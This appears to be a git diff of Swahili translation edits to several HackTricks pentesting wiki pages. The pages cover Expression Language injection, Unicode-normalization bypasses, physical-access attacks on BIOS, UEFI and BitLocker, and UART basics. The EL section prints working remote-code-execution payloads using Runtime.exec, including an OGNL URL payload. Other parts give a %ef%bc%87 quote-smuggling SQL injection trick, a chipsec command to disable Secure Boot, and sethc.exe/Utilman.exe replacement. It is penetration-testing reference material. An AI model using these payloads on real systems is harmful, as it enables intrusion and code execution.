- **JavaServer Faces (JSF)**: Kwa kufunga vipengele vya UI kwa data/mambo ya nyuma.
- **JavaServer Pages (JSP)**: Kwa ufikiaji wa data na mabadiliko ndani ya kurasa za JSP.
- **Mizizi na Uingizaji wa Mitegemezi kwa Java EE (CDI)**: Kwa kurahisisha mwingiliano wa safu ya wavuti na mabano yaliyosimamiwa.
- **Muktadha na Uingizaji wa Mtegemezi kwa Java EE (CDI)**: Kwa kurahisisha mwingiliano wa safu ya wavuti na mabano yaliyosimamiwa.
**Muktadha wa Matumizi**:
- **Spring Framework**: Kutumika katika moduli mbalimbali kama Usalama na Data.
- **Matumizi ya Kawaida**: Kupitia API ya SpEL na watengenezaji katika lugha zinazotegemea JVM kama Java, Kotlin, na Scala.
EL iko katika teknolojia za JavaEE, mazingira ya kujitegemea, na inatambulika kupitia nyongeza za `.jsp` au `.jsf`, makosa ya stak na maneno kama "Servlet" kwenye vichwa. Hata hivyo, vipengele vyake na matumizi ya wahusika fulani vinaweza kutegemea toleo.
EL iko katika teknolojia za JavaEE, mazingira ya kujitegemea, na inatambulika kupitia nyongeza za faili za `.jsp` au `.jsf`, makosa ya stak na maneno kama "Servlet" kwenye vichwa. Hata hivyo, vipengele vyake na matumizi ya wahusika fulani vinaweza kutegemea toleo.
{% hint style="info" %}
Kulingana na **toleo la EL** baadhi ya **vipengele** vinaweza kuwa **Hewa** au **Walemavu** na kawaida baadhi ya **wahusika** wanaweza kuwa **hairuhusiwi**.
{% endhint %}
## Mfano wa Msingi
## Mfano Msingi
(Unaweza kupata mafunzo mengine ya kuvutia kuhusu EL katika [https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/](https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/))
@ -88,13 +88,13 @@ Enter a String to evaluate:
{5*5}
[25]
```
Tafadhali angalia jinsi neno `{5*5}` lilivyokuwa **likihakikiwa**.
Note jinsi term `{5*5}` ilivyokuwa **imehakikiwa**.
## **Mafunzo Yaliyojikita kwenye CVE**
Angalia kwenye **chapisho hili: [https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a](https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a)**
Angalia katika **chapisho hili: [https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a](https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a)**
## Mzigo wa Mabomu
## Mzigo
### Vitendo vya Msingi
```bash
@ -171,7 +171,7 @@ https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlCo
```bash
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=@java.lang.Runtime@getRuntime(),%23ssss=new%20java.lang.String[3],%23ssss[0]="cmd",%23ssss[1]="%2fC",%23ssss[2]=%23parameters.INJPARAM[0],%23wwww.exec(%23ssss),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.INJPARAM[0])%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=touch%20/tmp/InjectedFile.txt
```
* **Udhibiti wa Kijijini Zaidi**
* **Mengine RCE**
```java
// Common RCE payloads
''.class.forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(<COMMAND STRING/ARRAY>)
@ -209,13 +209,13 @@ T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec
```
### Kuchunguza mazingira
* `applicationScope` - mazingira ya kimataifa ya programu
* `requestScope` - variables za ombi
* `initParam` - variables za kuanzisha programu
* `sessionScope` - variables za kikao
* `param.X` - thamani ya param ambapo X ni jina la parameta ya http
* `applicationScope` - mazingira ya programu ya jumla
* `requestScope` - mazingira ya ombi
* `initParam` - mazingira ya kuanzisha programu
* `sessionScope` - mazingira ya kikao
* `param.X` - thamani ya param ambapo X ni jina la parameter ya http
Utahitaji kubadilisha variables hizi kuwa String kama:
Utahitaji kubadilisha mazingira haya kuwa String kama:
```bash
${sessionScope.toString()}
```
@ -223,13 +223,13 @@ ${sessionScope.toString()}
```bash
${pageContext.request.getSession().setAttribute("admin", true)}
```
Programu inaweza pia kutumia mabadiliko ya desturi kama:
Programu inaweza pia kutumia variables za desturi kama:
```bash
${user}
${password}
${employee.FirstName}
```
## Kupitisha WAF
## Kupita Kupitia WAF
Angalia [https://h1pmnh.github.io/post/writeup\_spring\_el\_waf\_bypass/](https://h1pmnh.github.io/post/writeup\_spring\_el\_waf\_bypass/)
@ -240,13 +240,13 @@ Angalia [https://h1pmnh.github.io/post/writeup\_spring\_el\_waf\_bypass/](https:
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools)
* [https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt](https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za kuiba**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za wizi wa habari.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
@ -256,10 +256,10 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Je! Unafanya kazi katika kampuni ya **usalama wa mtandao**? Je! Unataka kuona **kampuni yako ikitangazwa kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Je, unafanya kazi katika kampuni ya **usalama wa mtandao**? Je, unataka kuona **kampuni yako ikitangazwa kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Pata [**swagi rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) **kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha **telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

View file

@ -10,17 +10,17 @@ Njia nyingine za kusaidia HackTricks:
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba taarifa.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
@ -32,12 +32,12 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
## Kuelewa Unicode na Usawazishaji
Usawazishaji wa Unicode ni mchakato unaohakikisha uwakilishi tofauti wa binary wa wahusika unastandadishwa kwa thamani sawa ya binary. Mchakato huu ni muhimu katika kushughulikia herufi katika programu na usindikaji wa data. Kiwango cha Unicode hufafanua aina mbili za usawa wa wahusika:
Usawazishaji wa Unicode ni mchakato unaohakikisha uwakilishi tofauti wa binary wa wahusika unastandadishwa kwa thamani sawa ya binary. Mchakato huu ni muhimu katika kushughulikia herufi katika programu na usindikaji wa data. Kiwango cha Unicode kinadefini aina mbili za usawa wa wahusika:
1. **Usawa wa Kanoni**: Wahusika wanachukuliwa kuwa sawa kwa kanoni ikiwa wanaonekana na kumaanisha sawa wakati wa kuchapishwa au kuonyeshwa.
1. **Usawa wa Kanoni**: Wahusika wanachukuliwa kuwa sawa kikanoni ikiwa wanaonekana na kumaanisha sawa wanapochapishwa au kuonyeshwa.
2. **Usawa wa Ulinganifu**: Aina dhaifu ya usawa ambapo wahusika wanaweza kuwakilisha wahusika sawa wa kimaarufu lakini wanaweza kuonyeshwa tofauti.
Kuna **algoritimu nne za usawazishaji wa Unicode**: NFC, NFD, NFKC, na NFKD. Kila algoritimu hutumia mbinu tofauti za usawazishaji wa kanoni na ufanani. Kwa uelewa zaidi, unaweza kuchunguza mbinu hizi kwenye [Unicode.org](https://unicode.org/).
Kuna **algoritimu nne za usawazishaji wa Unicode**: NFC, NFD, NFKC, na NFKD. Kila algoritimu inatumia mbinu tofauti za usawazishaji wa kanoni na ulinganifu. Kwa uelewa zaidi, unaweza kuchunguza mbinu hizi kwenye [Unicode.org](https://unicode.org/).
### Mambo Muhimu kuhusu Ufananuzi wa Unicode
@ -45,9 +45,9 @@ Kuelewa ufananuzi wa Unicode ni muhimu, hasa unaposhughulikia masuala ya kuingil
* **Pointi za Kanuni na Wahusika**: Katika Unicode, kila herufi au alama imepewa thamani ya nambari inayoitwa "pointi ya kanuni".
* **Uwakilishi wa Bayti**: Pointi ya kanuni (au herufi) inawakilishwa na bayti moja au zaidi kwenye kumbukumbu. Kwa mfano, herufi za LATIN-1 (zinazotumiwa sana katika nchi zinazozungumza Kiingereza) zinawakilishwa kwa kutumia bayti moja. Walakini, lugha zenye seti kubwa ya wahusika zinahitaji bayti zaidi kwa uwakilishi.
* **Ufananuzi**: Kauli hii inahusu jinsi wahusika wanavyobadilishwa kuwa mfululizo wa bayti. UTF-8 ni kiwango cha kawaida cha ufananuzi ambapo herufi za ASCII zinawakilishwa kwa kutumia bayti moja, na hadi bayti nne kwa wahusika wengine.
* **Ufananuzi**: Istilahi hii inahusu jinsi wahusika wanavyobadilishwa kuwa mfululizo wa bayti. UTF-8 ni kiwango cha ufananuzi ambapo herufi za ASCII zinawakilishwa kwa kutumia bayti moja, na hadi bayti nne kwa wahusika wengine.
* **Usindikaji wa Data**: Mifumo inayosindika data lazima iwe na ufahamu wa ufananuzi unaotumiwa ili kubadilisha mfululizo wa bayti kuwa wahusika.
* **Toleo za UTF**: Mbali na UTF-8, kuna viwango vingine vya ufananuzi kama UTF-16 (ikiwa na angalau bayti 2, hadi 4) na UTF-32 (ikiwa na bayti 4 kwa wahusika wote).
* **Toleo za UTF**: Mbali na UTF-8, kuna viwango vingine vya ufananuzi kama UTF-16 (ikitumia angalau bayti 2, hadi 4) na UTF-32 (ikitumia bayti 4 kwa wahusika wote).
Ni muhimu kuelewa dhana hizi ili kushughulikia na kupunguza masuala yanayoweza kutokea kutokana na utata wa Unicode na njia zake mbalimbali za ufananuzi.
@ -69,7 +69,7 @@ Ikiwa unaweza kupata ndani ya programu-jalizi ya wavuti thamani ambayo inarudiwa
Fikiria ukurasa wa wavuti unatumia herufi `'` kuunda maswali ya SQL na mchango wa mtumiaji. Wavuti hii, kama hatua ya usalama, **inafuta** matukio yote ya herufi **`'`** kutoka kwa mchango wa mtumiaji, lakini **baada ya kufuta** na **kabla ya uundaji** wa swali, inafanya **kawaida** kutumia **Unicode** mchango wa mtumiaji.
Kisha, mtumiaji mwenye nia mbaya anaweza kuingiza herufi tofauti ya Unicode inayolingana na `' (0x27)` kama `%ef%bc%87`, wakati mchango unapopata kawaida, alama ya nukta moja inaundwa na **kutokuwa na usalama wa SQLInjection** unaonekana:
Kisha, mtumiaji mwenye nia mbaya anaweza kuingiza herufi tofauti ya Unicode inayolingana na `' (0x27)` kama `%ef%bc%87`, wakati mchango unaponyooka, alama ya nukta moja inaundwa na **kutokuwa na usalama wa SQLInjection** unaonekana:
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (699).png>)
@ -109,15 +109,15 @@ Unaweza kutumia moja ya herufi zifuatazo kudanganya programu ya wavuti na kutumi
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (312) (2).png>)
Tambua kwamba kwa mfano herufi ya kwanza ya Unicode inaweza kutumwa kama: `%e2%89%ae` au kama `%u226e`
Tambua kwamba kwa mfano herufi ya kwanza ya Unicode inayopendekezwa inaweza kutumwa kama: `%e2%89%ae` au kama `%u226e`
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (215) (1) (1).png>)
### Fuzzing Regexes
Wakati seva ya nyuma ina **angalia kuingia kwa mtumiaji na regex**, inaweza kuwa inawezekana kwamba **kuingia** ina **kawaida** kwa **regex** lakini **sio** kwa mahali ambapo inatumika. Kwa mfano, katika Uelekezaji wa Wazi au SSRF regex inaweza kuwa **kawaida URL iliyotumwa** lakini kisha **kuiweka kama ilivyo**.
Wakati **backend inachunguza kuingia kwa mtumiaji na regex**, inaweza kuwa inawezekana kwamba **kuingia** ina **kawaida** kwa **regex** lakini **sio** kwa mahali ambapo inatumika. Kwa mfano, katika Uelekezaji wa Wazi au SSRF regex inaweza kuwa **inaweka kawaida URL** iliyotumwa lakini kisha **kuifikia kama ilivyo**.
Zana [**recollapse**](https://github.com/0xacb/recollapse) inaruhusu **kuzalisha mabadiliko ya kuingia** kufanya fuzzing kwa seva ya nyuma. Kwa habari zaidi angalia **github** na hii [**chapisho**](https://0xacb.com/2022/11/21/recollapse/).
Zana [**recollapse**](https://github.com/0xacb/recollapse) inaruhusu **kuzalisha mabadiliko ya kuingia** kufanya fuzzing kwenye backend. Kwa habari zaidi angalia **github** na hii [**chapisho**](https://0xacb.com/2022/11/21/recollapse/).
## Marejeo
@ -125,13 +125,13 @@ Zana [**recollapse**](https://github.com/0xacb/recollapse) inaruhusu **kuzalisha
* [**https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work**](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work)
* [**https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa **huduma za bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi ya kuiba habari.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za wizi wa habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** hapa:
@ -139,7 +139,7 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** hapa:
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
@ -147,6 +147,6 @@ Njia nyingine za kusaidia HackTricks:
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -2,7 +2,7 @@
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi mtaalamu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalamu wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
@ -14,13 +14,13 @@ Njia nyingine za kusaidia HackTricks:
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba habari.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulizi ya ransomware yanayotokana na malware za kuiba habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
@ -38,7 +38,7 @@ Katika hali ambapo nenosiri la BIOS halijulikani, kulipiga **mara tatu** kwa kaw
### Usalama wa UEFI
Kwa mifumo ya kisasa inayotumia **UEFI** badala ya BIOS za jadi, zana **chipsec** inaweza kutumika kuchambua na kurekebisha mipangilio ya UEFI, ikiwa ni pamoja na kulemaza **Secure Boot**. Hii inaweza kufanywa kwa amri ifuatayo:
Kwa mifumo ya kisasa inayotumia **UEFI** badala ya BIOS ya jadi, zana ya **chipsec** inaweza kutumika kuchambua na kurekebisha mipangilio ya UEFI, ikiwa ni pamoja na kulemaza **Secure Boot**. Hii inaweza kufanywa kwa amri ifuatayo:
`python chipsec_main.py -module exploits.secure.boot.pk`
@ -52,21 +52,21 @@ RAM inahifadhi data kwa muda mfupi baada ya umeme kukatwa, kawaida kwa muda wa *
### CD/USB ya Moja kwa Moja kwa Upatikanaji wa Mfumo
Kubadilisha faili za mfumo kama **_sethc.exe_** au **_Utilman.exe_** na nakala ya **_cmd.exe_** inaweza kutoa dirisha la amri lenye mamlaka ya mfumo. Zana kama **chntpw** inaweza kutumika kuhariri faili ya **SAM** ya usanidi wa Windows, kuruhusu mabadiliko ya nenosiri.
Kubadilisha faili za mfumo kama **_sethc.exe_** au **_Utilman.exe_** na nakala ya **_cmd.exe_** inaweza kutoa dirisha la amri lenye mamlaka ya mfumo. Zana kama **chntpw** zinaweza kutumika kuhariri faili ya **SAM** ya usanidi wa Windows, kuruhusu mabadiliko ya nenosiri.
**Kon-Boot** ni zana inayorahisisha kuingia kwenye mifumo ya Windows bila kujua nenosiri kwa muda kwa kurekebisha muda mfupi wa Windows au UEFI. Taarifa zaidi inaweza kupatikana kwenye [https://www.raymond.cc](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/).
### Kushughulikia Vipengele vya Usalama vya Windows
#### Vielekezo vya Kuanza na Kurejesha
#### Vifunguo vya Kuanzisha na Kurejesha
- **Supr**: Kufikia mipangilio ya BIOS.
- **F8**: Ingia kwenye hali ya Kurejesha.
- Kupiga **Shift** baada ya bendera ya Windows kunaweza kuepuka kuingia moja kwa moja.
- Kupiga **Shift** baada ya bendera ya Windows kunaweza kuzidi kiotomatiki.
#### Vifaa vya BAD USB
Vifaa kama **Rubber Ducky** na **Teensyduino** hutumika kama majukwaa ya kuunda vifaa vya **USB mbaya**, vinavyoweza kutekeleza malipo yaliyopangwa mapema wakati vinapounganishwa kwenye kompyuta ya lengo.
Vifaa kama **Rubber Ducky** na **Teensyduino** hutumika kama majukwaa ya kuunda vifaa vya **USB mbaya**, vinavyoweza kutekeleza malipo yaliyopangwa awali wakati vinapounganishwa kwenye kompyuta ya lengo.
#### Nakala ya Kivuli cha Kiasi
@ -76,6 +76,32 @@ Mamlaka ya msimamizi inaruhusu uundaji wa nakala za faili nyeti, ikiwa ni pamoja
Ufichaji wa BitLocker unaweza kupitishwa ikiwa **nenosiri la urejeshaji** linapatikana ndani ya faili ya dumpu ya kumbukumbu (**MEMORY.DMP**). Zana kama **Elcomsoft Forensic Disk Decryptor** au **Passware Kit Forensic** zinaweza kutumika kwa madhumuni haya.
### Uhandisi wa Kijamii kwa Kuongeza Funguo za Uokoaji
### Uhandisi wa Kijamii kwa Kuongeza Funguo la Uokoaji
Funguo mpya za urejeshaji wa BitLocker zinaweza kuongezwa kupitia mbinu za uhandisi wa kijamii, kuwashawishi watumiaji kutekeleza amri ambayo inaongeza funguo mpya za urejeshaji zilizoundwa na sifuri, hivyo kusahilisha mchakato wa kufichua.
Funguo mpya la uokoaji wa BitLocker linaweza kuongezwa kupitia mbinu za uhandisi wa kijamii, kuwashawishi watumiaji kutekeleza amri ambayo inaongeza funguo mpya la uokoaji linaloundwa na sifuri, hivyo kufanya mchakato wa kufichua kuwa rahisi.
### [WhiteIntel](https://whiteintel.io)
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulizi ya ransomware yanayotokana na malware za kuiba habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi mtaalamu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalamu wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>

View file

@ -2,21 +2,21 @@
<details>
<summary><strong>Jifunze kuhack AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
@ -32,36 +32,36 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
UART ni itifaki ya mfululizo, ambayo inamaanisha inahamisha data kati ya vipengele biti moja kwa wakati. Tofauti na hilo, itifaki za mawasiliano ya mfululizo hupitisha data kwa wakati mmoja kupitia njia nyingi. Itifaki za mfululizo za kawaida ni pamoja na RS-232, I2C, SPI, CAN, Ethernet, HDMI, PCI Express, na USB.
Kwa ujumla, mstari unashikiliwa juu (kwa thamani ya mantiki 1) wakati UART iko katika hali ya kupumzika. Kisha, kwa kusudi la kuashiria mwanzo wa uhamisho wa data, mtumaji hutoa biti ya kuanza kwa mpokeaji, wakati ambapo ishara inashikiliwa chini (kwa thamani ya mantiki 0). Kisha, mtumaji hutoa biti tano hadi nane za data zinazojumuisha ujumbe halisi, ikifuatiwa na biti ya ukaguzi wa usawa na biti moja au mbili za kusimamisha (zenye thamani ya mantiki 1), kulingana na usanidi. Biti ya usawa, inayotumiwa kwa ukaguzi wa makosa, mara nyingi haionekani katika vitendo. Biti ya kusimamisha (au biti) inaashiria mwisho wa uhamisho.
